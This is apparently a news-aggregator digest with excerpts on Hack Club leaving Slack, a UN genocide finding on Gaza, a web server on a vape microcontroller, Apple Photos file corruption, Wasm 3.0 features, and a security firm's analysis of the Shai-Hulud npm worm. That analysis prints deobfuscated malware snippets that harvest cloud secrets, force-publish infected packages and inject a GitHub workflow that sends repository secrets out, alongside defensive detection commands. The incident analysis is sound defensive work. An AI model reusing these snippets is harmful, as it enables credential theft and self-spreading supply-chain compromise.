10 interesting stories served every morning and every evening.
Slack is extorting us with a $195k/yr bill increase An open letter, or something
For nearly 11 years, Hack Club - a nonprofit that provides coding education and community to teenagers worldwide - has used Slack as the tool for communication. We weren’t freeloaders. A few years ago, when Slack transitioned us from their free nonprofit plan to a $5,000/year arrangement, we happily paid. It was reasonable, and we valued the service they provided to our community.
However, two days ago, Slack reached out to us and said that if we don’t agree to pay an extra $50k this week and $200k a year, they’ll deactivate our Slack workspace and delete all of our message history.
One could argue that Slack is free to stop providing us the nonprofit offer at any time, but in my opinion, a six month grace period is the bare minimum for a massive hike like this, if not more. Essentially, Salesforce (a $230 billion company) is strong-arming a small nonprofit for teens, by providing less than a week to pony up a pretty massive sum of money, or risk cutting off all our communications. That’s absurd.
The small amount of notice has also been catastrophic for the programs that we run. Dozens of our staff and volunteers are now scrambling to update systems, rebuild integrations and migrate years of institutional knowledge. The opportunity cost of this forced migration is simply staggering.
Anyway, we’re moving to Mattermost. This experience has taught us that owning your data is incredibly important, and if you’re a small business especially, then I’d advise you move away too.
This post was rushed out because, well, this has been a shock! If you’d like any additional details then feel free to send me an email.
...
Read the original on skyfall.dev »
The UN’s top investigative body on Palestine and Israel ruled on Tuesday that Israel is guilty of the crime of genocide in Gaza, in the most authoritative pronouncement to date.
The 72-page report by the UN commission of inquiry on Palestine and Israel finds Israel has committed four of the five acts prohibited under the 1948 Genocide Convention, and that Israeli leaders had the intent to destroy Palestinians in Gaza as a group.
The finding echoes reports by Palestinian, Israeli and international rights groups that have reached the same conclusion over the past year.
But this is the first comprehensive legal probe by a UN body, serving as an indicator of a judgment by the International Court of Justice (ICJ), which is currently hearing a case by South Africa accusing Israel of genocide. The ICJ case is expected to take several years to be concluded.
“For the finding on Israel’s responsibility for its conduct in Gaza, the commission used the legal standard set forth by the International Court of Justice. This is therefore the most authoritative finding emanating from the United Nations to date,” Navi Pillay, the commission’s chair, told Middle East Eye.
“Reports generated by the United Nations, including by a commission of inquiry, bear particular probative value and can be relied upon by all domestic and international courts.”
Pillay, a prominent jurist who previously served as the UN’s high commissioner for human rights and the President of the International Criminal Tribunal for Rwanda, said all states had an unequivocal legal obligation to prevent the genocide in Gaza. She also urged the UK government to review its stance on the Gaza genocide, including its refusal to label it as such.
“The obligation to prevent genocide arises when states learn of the existence of a serious risk of genocide and thus states, including the UK, must act without the need to wait for a judicial determination to prevent genocide,” she said.
Another member of the commission, Chris Sidoti, told MEE that states must act now to prevent genocide. “There is no excuse now for not acting,” he said.
“The UN report will remain the most authoritative statement until the International Court of Justice completes and rules on the genocide case brought against Israel.”
The report is due to be presented to the UN General Assembly in October.
‘This is the most authoritative finding emanating from the United Nations to date’
It calls on UN member states to take several measures, including halting arms transfers to Israel and imposing sanctions against Israel and individuals or corporations that are involved in or facilitating genocide or incitement to commit the crime.
The report concluded that Israel has committed genocide against Palestinians in Gaza since 7 October 2023, covering the period from that date until 31 July 2025.
It said that Israel has committed four acts of genocide:
Killing members of the group: Palestinians were killed in large numbers through direct attacks on civilians, protected persons, and vital civilian infrastructure, as well as by the deliberate creation of conditions that led to death.
Causing serious bodily or mental harm: Palestinians suffered torture, rape, sexual assault, forced displacement, and severe mistreatment in detention, alongside widespread attacks on civilians and the environment.
Inflicting conditions of life calculated to destroy the group: Israel deliberately imposed inhumane living conditions in Gaza, including destruction of essential infrastructure, denial of medical care, forced displacement, blocking of food, water, fuel, and electricity, reproductive violence, and starvation as a method of warfare. Children were found to be particularly targeted.
Preventing births within the group: The attack on Gaza’s largest fertility clinic destroyed thousands of embryos, sperm samples, and eggs. Experts told the commission this would prevent thousands of Palestinian children from ever being born.
In addition to the genocidal acts, the investigation concluded that the Israeli authorities and security forces have the genocidal intent to destroy, in whole or in part, the Palestinians in the Gaza Strip
Genocidal intent is often the hardest to prove in any genocide case. But the authors of the report have found “fully conclusive evidence” of such intent.
They cited statements made by Israeli authorities, including President Isaac Herzog, Prime Minister Benjamin Netanyahu and Yoav Gallant - who served as defence minister for much of the war - as direct evidence of genocidal intent.
It also found that the three leaders have committed the crime of incitement to genocide, a substantive crime under Article III of the convention, regardless of whether genocide was committed.
Additionally, on the basis of circumstantial evidence, the commission found that genocidal intent was the “only reasonable inference” that could be drawn based on the pattern of conduct of the Israeli authorities. That is the same standard of proof that will be used by the ICJ in its current proceedings against Israel.
The commission said it identified six patterns of conduct by Israeli forces in Gaza that support an inference of genocidal intent:
Mass killings: Israeli forces have killed and seriously harmed an unprecedented number of Palestinians since 7 October 2023, mostly civilians, using heavy munitions in densely populated areas. By 15 July 2025, 83 percent of those killed were civilians, the report found. Nearly half were women and children.
Cultural destruction: The systematic leveling of homes, schools, mosques, churches, and cultural sites was cited as evidence of an effort to erase Palestinian identity.
Deliberate suffering: Despite three provisional orders from the ICJ and repeated international warnings, Israel continued policies knowing Palestinians were trapped and unable to flee, the commission said.
Collapse of healthcare: Israeli forces targeted Gaza’s healthcare system, attacking hospitals, killing and abusing medical personnel, and blocking vital supplies and patient evacuations.
Sexual violence: Investigators documented sexualised torture, rape, and other forms of gender-based violence, describing them as tools of collective punishment.
Targeting children: Children were shot by snipers and drones, including during evacuations and at shelters, with some killed while carrying white flags.
“Israeli political and military leaders are agents of the State of Israel; therefore, their acts are attributable to the State of Israel,” the report read.
“The State of Israel bears responsibility for the failure to prevent genocide, the commission of genocide and the failure to punish genocide against the Palestinians in the Gaza Strip.”
The three-member commission of inquiry was established in May 2021 by the Geneva-based UN Human Rights Council (HRC) with a permanent mandate to investigate international humanitarian and human rights law violations in occupied Palestine and Israel from April 2021.
The commission is mandated to report annually to the HRC and the UN General Assembly. Its members are independent experts, unpaid by the UN, on an open-ended mandate.
The commission’s reports are highly authoritative and are widely cited by international legal bodies, including the ICJ and the International Criminal Court in The Hague.
Over the past four years, it has produced some of the most groundbreaking reports on international law breaches in Israel and Palestine.
Since 7 October 2023, the commission has issued three reports and three papers on international law breaches by different parties.
Previous reports have concluded that Israeli forces have committed crimes against humanity and war crimes in Gaza, including, among others, extermination, torture, rape, sexual violence and starvation as a method of warfare. They also concluded that two acts of genocide had been committed in Gaza.
Its three members are eminent human rights and legal experts.
Pillay served as UN high commissioner for human rights from 2008 to 2014. She previously served as a judge in the ICJ and presided over the UN’s ad hoc tribunal for Rwanda.
Miloon Kothari served as the first UN special rapporteur on adequate housing between 2000 and 2008, while Sidoti is the former Australian human rights commissioner and previously served as a member of the UN Independent International Fact-Finding Mission on Myanmar from 2017 to 2019.
...
Read the original on www.middleeasteye.net »
This article is NOT served from a web server running on a disposable vape. If you want to see the real deal, click here. The content is otherwise identical.
For a couple of years now, I have been collecting disposable vapes from friends and family. Initially, I only salvaged the batteries for “future” projects (It’s not hoarding, I promise), but recently, disposable vapes have gotten more advanced. I wouldn’t want to be the lawyer who one day will have to argue how a device with USB C and a rechargeable battery can be classified as “disposable”. Thankfully, I don’t plan on pursuing law anytime soon.
Last year, I was tearing apart some of these fancier pacifiers for adults when I noticed something that caught my eye, instead of the expected black blob of goo hiding some ASIC (Application Specific Integrated Circuit) I see a little integrated circuit inscribed “PUYA”. I don’t blame you if this name doesn’t excite you as much it does me, most people have never heard of them. They are most well known for their flash chips, but I first came across them after reading Jay Carlson’s blog post about the cheapest flash microcontroller you can buy. They are quite capable little ARM Cortex-M0+ micros.
Over the past year I have collected quite a few of these PY32 based vapes, all of them from different models of vape from the same manufacturer. It’s not my place to do free advertising for big tobacco, so I won’t mention the brand I got it from, but if anyone who worked on designing them reads this, thanks for labeling the debug pins!
The chip is marked PUYA C642F15, which wasn’t very helpful. I was pretty sure it was a PY32F002A, but after poking around with pyOCD, I noticed that the flash was 24k and we have 3k of RAM. The extra flash meant that it was more likely a PY32F002B, which is actually a very different chip.
So here are the specs of a microcontroller so bad, it’s basically disposable:
* a few peripherals, none of which we will use.
You may look at those specs and think that it’s not much to work with. I don’t blame you, a 10y old phone can barely load google, and this is about 100x slower. I on the other hand see a blazingly fast web server.
The idea of hosting a web server on a vape didn’t come to me instantly. In fact, I have been playing around with them for a while, but after writing my post on semihosting, the penny dropped.
If you don’t feel like reading that article, semihosting is basically syscalls for embedded ARM microcontrollers. You throw some values/pointers into some registers and call a breakpoint instruction. An attached debugger interprets the values in the registers and performs certain actions. Most people just use this to get some logs printed from the microcontroller, but they are actually bi-directional.
If you are older than me, you might remember a time before Wi-Fi and Ethernet, the dark ages, when you had to use dial-up modems to get online. You might also know that the ghosts of those modems still linger all around us. Almost all USB serial devices actually emulate those modems: a 56k modem is just 57600 baud serial device. Data between some of these modems was transmitted using a protocol called SLIP (Serial Line Internet Protocol).
This may not come as a surprise, but Linux (and with some tweaking even macOS) supports SLIP. The slattach utility can make any /dev/tty* send and receive IP packets. All we have to do is put the data down the wire in the right format and provide a virtual tty. This is actually easier than you might imagine, pyOCD can forward all semihosting though a telnet port. Then, we use socat to link that port to a virtual tty:
Ok, so we have a “modem”, but that’s hardly a web server. To actually talk TCP/IP, we need an IP stack. There are many choices, but I went with uIP because it’s pretty small, doesn’t require an RTOS, and it’s easy to port to other platforms. It also, helpfully, comes with a very minimal HTTP server example.
After porting the SLIP code to use semihosting, I had a working web server…half of the time. As with most highly optimised libraries, uIP was designed for 8 and 16-bit machines, which rarely have memory alignment requirements. On ARM however, if you dereference a u16 *, you better hope that address is even, or you’ll get an exception. The uip_chksum assumed u16 alignment, but the script that creates the filesystem didn’t. I actually decided to modify a bit the structure of the filesystem to make it a bit more portable. This was my first time working with perl and I have to say, it’s quite well suited to this kind of task.
So how fast is a web server running on a disposable microcontroller. Well, initially, not very fast. Pings took ~1.5s with 50% packet loss and a simple page took over 20s to load. That’s so bad, it’s actually funny, and I kind of wanted to leave it there.
However, the problem was actually between the seat and the steering wheel the whole time. The first implementation read and wrote a single character at a time, which had a massive overhead associated with it. I previously benchmarked semihosting on this device, and I was getting ~20KiB/s, but uIP’s SLIP implementation was designed for very low memory devices, so it was serialising the data byte by byte. We have a whopping 3kiB of RAM to play with, so I added a ring buffer to cache reads from the host and feed them into the SLIP poll function. I also split writes in batches to allow for escaping.
Now this is what I call blazingly fast! Pings now take 20ms, no packet loss and a full page loads in about 160ms. This was using using almost all of the RAM, but I could also dial down the sizes of the buffer to have more than enough headroom to run other tasks. The project repo has everything set to a nice balance latency and RAM usage:
Memory region Used Size Region Size %age Used
FLASH: 5116 B 24 KB 20.82%
RAM: 1380 B 3 KB 44.92%
For this blog however, I paid for none of the RAM, so I’ll use all of the RAM.
As you may have noticed, we have just under 20kiB (80%) of storage space. That may not be enough to ship all of React, but as you can see, it’s more than enough to host this entire blog post. And this is not just a static page server, you can run any server-side code you want, if you know C that is.
Just for fun, I added a json api endpoint to get the number of requests to the main page (since the last crash) and the unique ID of the microcontroller.
...
Read the original on bogdanthegeek.github.io »
The Apple Photos app sometimes corrupts images when importing from my camera. I just wanted to make a blog post about it in case anyone else runs into the problem. I’ve seen other references to this online, but most of the people gave up trying to fix it, and none of them went as far as I did to debug the issue.
I’ll try to describe the problem, and the things I’ve tried to do to fix it. But also note that I’ve (sort of) given up on the Photos app too. Since I can’t trust it to import photos from my camera, I switched to a different workflow.
Here is a screenshot of a corrupted image in the Photos app:
I’ve got an OM System OM-1 camera. I used to shoot in RAW + jpg, then when I would import to Photos app, I would check the “delete photos after import” checkbox in order to empty the SD card. Turns out “delete after import” was a huge mistake.
I’m pretty sure I’d been getting corrupted images for a while, but it would only be 1 or 2 images out of thousands, so I thought nothing of it (it was probably my fault anyway, right?)
But the problem really got me upset when last year I went to a family member’s wedding and took tons of photos. Apple Photos combines RAW + jpg photos so you don’t have a bunch of duplicates, and when you view the images in the photos app, it just shows you the jpg version by default. After I imported all of the wedding photos I noticed some of them were corrupted. Upon closer inspection, I found that it sometimes had corrupted the jpg, sometimes corrupted the RAW file, and sometimes both. Since I had been checking the “delete after import” box, I didn’t know if the images on the SD card were corrupted before importing or not. After all, the files had been deleted so there was no way to check.
I estimate I completely lost about 30% of the images I took that day.
Losing so many photos really rattled me, but I wanted to figure out the problem so I didn’t lose images in the future.
I was worried this was somehow a hardware problem. Copying files seems so basic, I didn’t think there was any way a massively deployed app like Photos could fuck it up (especially since its main job is managing photo files). So, to narrow down the issue I changed out all of the hardware. Here are all the things I did:
* Bought a new SD card direct from the manufacturer (to eliminate the possibility of buying a bootleg SD card)
* Switched to only shooting in RAW (if importing messes up 30% of my images, but I cut the number of images I import by half, then that should be fewer corrupted images right? lol)
I did each of these steps over time, as to only change one variable at a time, and still the image corruption persisted. I didn’t really want to buy a new camera, the MKii is not really a big improvement over the OM-1, but we had a family trip coming up and the idea that pressing the shutter button on the camera might not actually record the image didn’t sit well with me.
Since I had replaced literally all of the hardware involved, I knew it must be a software problem. I stopped checking the “delete after import” button, and started reviewing all of the photos after import. After verifying none of them were corrupt, then I would format the SD card. I did this for months without finding any corrupt files. At this point I figured it was somehow a race condition or something when copying the photo files and deleting them at the same time.
However, after I got home from RailsConf and imported my photos, I found one corrupt image (the one above). I was able to verify that the image was not corrupt on the SD card, so the camera was working fine (meaning I probably didn’t need to buy a new camera body at all).
I tried deleting the corrupt file and re-importing the original to see if it was something about that particular image, but it re-imported just fine. In other words, it seems like the Photos app will corrupt files randomly.
I don’t know if this is a problem that is specific to OM System cameras, and I’m not particularly interested in investing in a new camera system just to find out.
If I compare the corrupted image with the non-corrupted image, the file sizes are exactly the same, but the bytes are different:
aaron@tc ~/Downloads> md5sum P7110136-from-camera.ORF Exports/P7110136.ORF
17ce895fd809a43bad1fe8832c811848 P7110136-from-camera.ORF
828a33005f6b71aea16d9c2f2991a997 Exports/P7110136.ORF
aaron@tc ~/Downloads> ls -al P7110136-from-camera.ORF Exports/P7110136.ORF
-rw–––-@ 1 aaron staff 18673943 Jul 12 04:38 Exports/P7110136.ORF
-rwx––– 1 aaron staff 18673943 Jul 17 09:29 P7110136-from-camera.ORF*
The P7110136-from-camera. ORF is the non-corrupted file, and Exports/P7110136.ORF is the corrupted file from Photos app. Here’s a screenshot of the preview of the non-corrupted photo:
Here is the binary diff between the files. I ran both files through xxd then diffed them. Also if anyone cares to look, I’ve posted the RAW files here on GitHub.
I’m not going to put any more effort into debugging this problem, but I wanted to blog about it in case anyone else is seeing the issue. I take a lot of photos, and to be frank, most of them are not very good. I don’t want to look through a bunch of bad photos every time I look at my library, so culling photos is important. Culling photos in the Photos app is way too cumbersome, so I’ve switched to using Darktable.
* Delete the ones I don’t like
* Process ones I do like
* Export both the jpg and the original raw file
* Import those to the Photos app so they’re easy to view and share
I’ve not seen any file corruption when importing to Darktable, so I am convinced this is a problem with the Photos app. But now, since all of my images land in Darktable before making their way to the Photos app, I don’t really care anymore. The bad news is that I’ve spent a lot of time and money trying to debug this. I guess the good news is that now I have redundant hardware!
...
Read the original on tenderlovemaking.com »
The popular @ctrl/tinycolor package with over 2 million weekly downloads has been compromised alongside 40+ other NPM packages in a sophisticated supply chain attack dubbed “Shai-Hulud”. The malware self-propagates across maintainer packages, harvests AWS/GCP/Azure credentials using TruffleHog, and establishes persistence through GitHub Actions backdoors - representing a major escalation in NPM ecosystem threats. The NPM ecosystem is facing another critical supply chain attack. The popular @ctrl/tinycolor package, which receives over 2 million weekly downloads, has been compromised along with more than 40 other packages across multiple maintainers. This attack demonstrates a concerning evolution in supply chain threats - the malware includes a self-propagating mechanism that automatically infects downstream packages, creating a cascading compromise across the ecosystem. The compromised versions have been removed from npm.In this post, we’ll dive deep into the payload’s mechanics, including deobfuscated code snippets, API call traces, and diagrams to illustrate the attack chain. Our analysis reveals a Webpack-bundled script (bundle.js) that leverages Node.js modules for reconnaissance, harvesting, and propagation; targeting Linux/macOS devs with access to NPM/GitHub/cloud creds.To help the community respond to this incident, StepSecurity hosted a Community Office Hour on September 16th at 1 PM PT. The recording is available here: https://www.youtube.com/watch?v=D9jXoT1rtaQThe attack unfolds through a sophisticated multi-stage chain that leverages Node.js’s process.env for opportunistic credential access and employs Webpack-bundled modules for modularity. At the core of this attack is a ~3.6MB minified bundle.js file, which executes asynchronously during npm install. This execution is likely triggered via a hijacked postinstall script embedded in the compromised package.json.The malware includes a self-propagation mechanism through the NpmModule.updatePackage function. This function queries the NPM registry API to fetch up to 20 packages owned by the maintainer, then force-publishes patches to these packages. This creates a cascading compromise effect, recursively injecting the malicious bundle into dependent ecosystems across the NPM registry.The malware repurposes open-source tools like TruffleHog to scan the filesystem for high-entropy secrets. It searches for patterns such as AWS keys using regular expressions like AKIA[0-9A-Z]{16}. Additionally, the malware dumps the entire process.env, capturing transient tokens such as GITHUB_TOKEN and AWS_ACCESS_KEY_ID.For cloud-specific operations, the malware enumerates AWS Secrets Manager using SDK pagination and accesses Google Cloud Platform secrets via the @google-cloud/secret-manager API. The malware specifically targets the following credentials:The malware establishes persistence by injecting a GitHub Actions workflow file (.github/workflows/shai-hulud-workflow.yml) via a base64-encoded bash script. This workflow triggers on push events and exfiltrates repository secrets using the expression ${{ toJSON(secrets) }} to a command and control endpoint. The malware creates branches by force-merging from the default branch (refs/heads/shai-hulud) using GitHub’s /git/refs endpoint.The malware aggregates harvested credentials into a JSON payload, which is pretty-printed for readability. It then uploads this data to a new public repository named Shai-Hulud via the GitHub /user/repos API.The entire attack design assumes Linux or macOS execution environments, checking for os.platform() === ‘linux’ || ‘darwin’. It deliberately skips Windows systems. For a visual breakdown, see the attack flow diagram below:The compromise begins with a sophisticated minified JavaScript bundle injected into affected packages like @ctrl/tinycolor. This is not rudimentary malware but rather a sophisticated modular engine that uses Webpack chunks to organize OS utilities, cloud SDKs, and API wrappers.The payload imports six core modules, each serving a specific function in the attack chain.This module calls getSystemInfo() to build a comprehensive system profile containing platform, architecture, platformRaw, and archRaw information. It dumps the entire process.env, capturing sensitive environment variables including AWS_ACCESS_KEY_ID, GITHUB_TOKEN, and other credentials that may be present in the environment.The AWS harvesting module validates credentials using the STS AssumeRoleWithWebIdentityCommand. It then enumerates secrets using the @aws-sdk/client-secrets-manager library.// Deobfuscated AWS harvest snippet
async getAllSecretValues() {
const secrets = [];
let nextToken;
do {
const resp = await client.send(new ListSecretsCommand({ NextToken: nextToken }));
for (const secret of resp.SecretList || []) {
const value = await client.send(new GetSecretValueCommand({ SecretId: secret.ARN }));
secrets.push({ ARN: secret.ARN, SecretString: value.SecretString, SecretBinary: atob(value.SecretBinary) }); // Base64 decode binaries
nextToken = resp.NextToken;
} while (nextToken);
return secrets;
}The module handles errors such as DecryptionFailure or ResourceNotFoundException silently through decorateServiceException wrappers. It targets all AWS regions via endpoint resolution.The GCP module uses @google-cloud/secret-manager to list secrets matching the pattern projects//secrets/. It implements pagination using nextPageToken and returns objects containing the secret name and decoded payload. The module fails silently on PERMISSION_DENIED errors without alerting the user.This module spawns TruffleHog via child_process.exec(‘trufflehog filesystem / –json’) to scan the entire filesystem. It parses the output for high-entropy matches, such as AWS keys found in ~/.aws/credentials.The NPM propagation module parses NPM_TOKEN from either ~/.npmrc or environment variables. After validating the token via the /whoami endpoint, it queries /v1/search?text=maintainer:${username}&size=20 to retrieve packages owned by the maintainer.// Deobfuscated NPM update snippet
async updatePackage(pkg) {
// Patch package.json (add self as dep?) and publish
await exec(`npm version patch –force && npm publish –access public –token ${token}`);
}This creates a cascading effect where an infected package leads to compromised maintainer credentials, which in turn infects all other packages maintained by that user.The GitHub backdoor module authenticates via the /user endpoint, requiring repo and workflow scopes. After listing organizations, it injects malicious code via a bash script (Module 941).Here is the line-by-line bash script deconstruction:# Deobfuscated Code snippet
#!/bin/bash
GITHUB_TOKEN=“$1”
BRANCH_NAME=“shai-hulud”
FILE_NAME=”.github/workflows/shai-hulud-workflow.yml”
FILE_CONTENT=$(cat <This workflow is executed as soon as the compromised package create a commit with it, which immediately exfiltrates all the secrets.The malware builds a comprehensive JSON payload containing system information, environment variables, and data from all modules. It then creates a public repository via the GitHub /repos POST endpoint using the function makeRepo(‘Shai-Hulud’). The repository is public by default to ensure easy access for the command and control infrastructure.We are observing hundreds of such public repositories containing exfiltrated credentials. A GitHub search for “Shai-Hulud” repositories reveals the ongoing and widespread nature of this attack, with new repositories being created as more systems execute the compromised packages.This exfiltration technique is similar to the Nx supply chain attack we analyzed previously, where attackers also used public GitHub repositories to exfiltrate stolen credentials. This pattern of using GitHub as an exfiltration endpoint appears to be a preferred method for supply chain attackers, as it blends in with normal developer activity and bypasses many traditional security controls.These repositories contain sensitive information. The public nature of these repositories means that any attacker can access and potentially misuse these credentials, creating a secondary risk beyond the initial compromise.The attack employs several evasion techniques including silent error handling (swallowed via catch {} blocks), no logging output, and disguising TruffleHog execution as a legitimate “security scan.“We analyzed the malicious payload using StepSecurity Harden-Runner in a GitHub Actions workflow. Harden-Runner successfully flagged the suspicious behavior as anomalous. The public insights from this test reveal how the payload works:The compromised package made unauthorized API calls to api.github.com during the npm install processThese API interactions were flagged as anomalous since legitimate package installations should not be making such external API callsThese runtime detections confirm the sophisticated nature of the attack, with the malware attempting credential harvesting, self-propagation to other packages, and data exfiltration - all during what appears to be a routine package installation.The following indicators can help identify systems affected by this attack:Use these GitHub search queries to identify potentially compromised repositories across your organization:Replace ACME with your GitHub organization name and use the following GitHub search query to discover all instance of shai-hulud-workflow.yml in your GitHub environment.To find malicious branches, you can use the following Bash script:# List all repos and check for shai-hulud branch
gh repo list YOUR_ORG_NAME –limit 1000 –json nameWithOwner –jq ‘.[].nameWithOwner’ | while read repo; do
gh api “repos/$repo/branches” –jq ‘.[] | select(.name == “shai-hulud”) | “‘$repo’ has branch: ” + .name’
doneThe malicious bundle.js file has a SHA-256 hash of: 46faab8ab153fae6e80e7cca38eab363075bb524edd79e42269217a083628f09The following packages have been confirmed as compromised:If you use any of the affected packages, take these actions immediately:# Check for affected packages in your project
npm ls @ctrl/tinycolor
# Remove compromised packages
npm uninstall @ctrl/tinycolor
# Search for the known malicious bundle.js by hash
find . -type f -name “*.js” -exec sha256sum {} \; | grep “46faab8ab153fae6e80e7cca38eab363075bb524edd79e42269217a083628f09″# Check for and remove the backdoor workflow
rm -f .github/workflows/shai-hulud-workflow.yml
# Look for suspicious ‘shai-hulud’ branches in all repositories
git ls-remote –heads origin | grep shai-hulud
# Delete any malicious branches found
git push origin –delete shai-huludThe malware harvests credentials from multiple sources. Rotate ALL of the following:Any credentials stored in AWS Secrets Manager or GCP Secret ManagerSince the malware specifically targets AWS Secrets Manager and GCP Secret Manager, you need to audit your cloud infrastructure for unauthorized access. The malware uses API calls to enumerate and exfiltrate secrets, so reviewing audit logs is critical to understanding the scope of compromise.Start by examining your CloudTrail logs for any suspicious secret access patterns. Look specifically for BatchGetSecretValue, ListSecrets, and GetSecretValue API calls that occurred during the time window when the compromised package may have been installed. Also generate and review IAM credential reports to identify any unusual authentication patterns or newly created access keys.# Check CloudTrail for suspicious secret access
aws cloudtrail lookup-events –lookup-attributes AttributeKey=EventName,AttributeValue=BatchGetSecretValue
aws cloudtrail lookup-events –lookup-attributes AttributeKey=EventName,AttributeValue=ListSecrets
aws cloudtrail lookup-events –lookup-attributes AttributeKey=EventName,AttributeValue=GetSecretValue
# Review IAM credential reports for unusual activity
aws iam get-credential-report –query ’Content’For Google Cloud Platform, review your audit logs for any access to the Secret Manager service. The malware uses the @google-cloud/secret-manager library to enumerate secrets, so look for unusual patterns of secret access. Additionally, check for any unauthorized service account key creation, as these could be used for persistent access.# Review secret manager access logs
gcloud logging read “resource.type=secretmanager.googleapis.com” –limit=50 –format=json
# Check for unauthorized service account key creation
gcloud logging read “protoPayload.methodName=google.iam.admin.v1.CreateServiceAccountKey”Check deploy keys and repository secrets for all projectsSet up alerts for any new npm publishes from your organizationThe following steps are applicable only for StepSecurity enterprise customers. If you are not an existing enterprise customer, you can start our 14 day free trial by installing the StepSecurity GitHub App to complete the following recovery step.The NPM Cooldown check automatically fails a pull request if it introduces an npm package version that was released within the organization’s configured cooldown period (default: 2 days). Once the cooldown period has passed, the check will clear automatically with no action required. The rationale is simple - most supply chain attacks are detected within the first 24 hours of a malicious package release, and the projects that get compromised are often the ones that rushed to adopt the version immediately. By introducing a short waiting period before allowing new dependencies, teams can reduce their exposure to fresh attacks while still keeping their dependencies up to date.
Here is an example showing how this check protected a project from using the compromised versions of packages involved in this incident:We have added a new control specifically to detect pull requests that upgraded to these compromised packages. You can find the new control on the StepSecurity dashboard.Use StepSecurity Harden-Runner to detect compromised dependencies in CI/CDStepSecurity Harden-Runner adds runtime security monitoring to your GitHub Actions workflows, providing visibility into network calls, file system changes, and process executions during CI/CD runs. Harden-Runner detects the compromised nx packages when they are used in CI/CD. Here is a sample Harden-Runner insights page demonstrating this detection:If you’re already using Harden-Runner, we strongly recommend you review recent anomaly detections in your Harden-Runner dashboard. You can get started with Harden-Runner by following the guide at https://docs.stepsecurity.io/harden-runner.The StepSecurity Threat Center provides comprehensive details about this @ctrl/tinycolor compromise and all 40+ affected packages. Access the Threat Center through your dashboard to view IOCs, remediation guidance, and real-time updates as new compromised packages are discovered. Threat alerts are automatically delivered to your SIEM via AWS S3 and webhook integrations, enabling immediate incident response when supply chain attacks occur. Our detection systems identified this attack within minutes of publication, providing early warning before widespread exploitation.Use StepSecurity Artifact Monitor to detect software releases outside of authorized pipelinesStepSecurity Artifact Monitor provides real-time detection of unauthorized package releases by continuously monitoring your artifacts across package registries. This tool would have flagged this incident by detecting that the compromised versions were published outside of the project’s authorized CI/CD pipeline. The monitor tracks release patterns, verifies provenance, and alerts teams when packages are published through unusual channels or from unexpected locations. By implementing Artifact Monitor, organizations can catch supply chain compromises within minutes rather than hours or days, significantly reducing the window of exposure to malicious packages.Learn more about implementing Artifact Monitor in your security workflow at https://docs.stepsecurity.io/artifact-monitor.The npm security team and package maintainers for their swift response to this incident.@franky47, who promptly notified the community through a GitHub issueThe collaborative efforts of security researchers, maintainers, and community members continue to be essential in defending against supply chain attacks.The popular @ctrl/tinycolor package with over 2 million weekly downloads has been compromised alongside 40+ other NPM packages in a sophisticated supply chain attack dubbed “Shai-Hulud”. The malware self-propagates across maintainer packages, harvests AWS/GCP/Azure credentials using TruffleHog, and establishes persistence through GitHub Actions backdoors - representing a major escalation in NPM ecosystem threats.StepSecurity’s Harden-Runner protects 8,000+ repositories with EDR-style runtime monitoring for CI/CD pipelines, stopping supply chain attacks and securing GitHub Actions.Learn how to secure Google Gemini in GitHub Actions with Harden-Runner, combining observability with runtime monitoring for CI/CD security
...
Read the original on www.stepsecurity.io »
Three years ago, version 2.0 of the Wasm standard was (essentially) finished, which brought a number of new features, such as vector instructions, bulk memory operations, multiple return values, and simple reference types.
In the meantime, the Wasm W3C Community Group and Working Group have not been lazy. Today, we are happy to announce the release of Wasm 3.0 as the new “live” standard.
This is a substantially larger update: several big features, some of which have been in the making for six or eight years, finally made it over the finishing line.
64-bit address space. Memories and tables can now be declared to use i64 as their address type instead of just i32. That expands the available address space of Wasm applications from 4 gigabytes to (theoretically) 16 exabytes, to the extent that physical hardware allows. While the web will necessarily keep enforcing certain limits — on the web, a 64-bit memory is limited to 16 gigabytes — the new flexibility is especially interesting for non-web ecosystems using Wasm, as they can support much, much larger applications and data sets now.
Multiple memories. Contrary to popular belief, Wasm applications were always able to use multiple memory objects — and hence multiple address spaces — simultaneously. However, previously that was only possible by declaring and accessing each of them in separate modules. This gap has been closed, a single module can now declare (define or import) multiple memories and directly access them, including directly copying data between them. This finally allows tools like wasm-merge, which perform “static linking” on two or more Wasm modules by merging them into one, to work for all Wasm modules. It also paves the way for new uses of separate address spaces, e.g., for security (separating private data), for buffering, or for instrumentation.
Garbage collection. In addition to expanding the capabilities of raw linear memories, Wasm also adds support for a new (and separate) form of storage that is automatically managed by the Wasm runtime via a garbage collector. Staying true to the spirit of Wasm as a low-level language, Wasm GC is low-level as well: a compiler targeting Wasm can declare the memory layout of its runtime data structures in terms of struct and array types, plus unboxed tagged integers, whose allocation and lifetime is then handled by Wasm. But that’s it. Everything else, such as engineering suitable representations for source-language values, including implementation details like method tables, remains the responsibility of compilers targeting Wasm. There are no built-in object systems, nor closures or other higher-level constructs — which would inevitably be heavily biased towards specific languages. Instead, Wasm only provides the basic building blocks for representing such constructs and focuses purely on the memory management aspect.
Typed references. The GC extension is built upon a substantial extension to the Wasm type system, which now supports much richer forms of references. Reference types can now describe the exact shape of the referenced heap value, avoiding additional runtime checks that would otherwise be needed to ensure safety. This more expressive typing mechanism, including subtyping and type recursion, is also available for function references, making it possible to perform safe indirect function calls without any runtime type or bounds check, through the new call_ref instruction.
Tail calls. Tail calls are a variant of function calls that immediately exit the current function, and thereby avoid taking up additional stack space. Tail calls are an important mechanism that is used in various language implementations both in user-visible ways (e.g., in functional languages) and for internal techniques (e.g., to implement stubs). Wasm tail calls are fully general and work for callees both selected statically (by function index) and dynamically (by reference or table).
Exception handling. Exceptions provide a way to locally abort execution, and are a common feature in modern programming languages. Previously, there was no efficient way to compile exception handling to Wasm, and existing compilers typically resorted to convoluted ways of implementing them by escaping to the host language, e.g., JavaScript. This was neither portable nor efficient. Wasm 3.0 hence provides native exception handling within Wasm. Exceptions are defined by declaring exception tags with associated payload data. As one would expect, an exception can be thrown, and selectively be caught by a surrounding handler, based on its tag. Exception handlers are a new form of block instruction that includes a dispatch list of tag/label pairs or catch-all labels to define where to jump when an exception occurs.
Relaxed vector instructions. Wasm 2.0 added a large set of vector (SIMD) instructions, but due to differences in hardware, some of these instructions have to do extra work on some platforms to achieve the specified semantics. In order to squeeze out maximum performance, Wasm 3.0 introduces “relaxed” variants of these instructions that are allowed to have implementation-dependent behavior in certain edge cases. This behavior must be selected from a pre-specified set of legal choices.
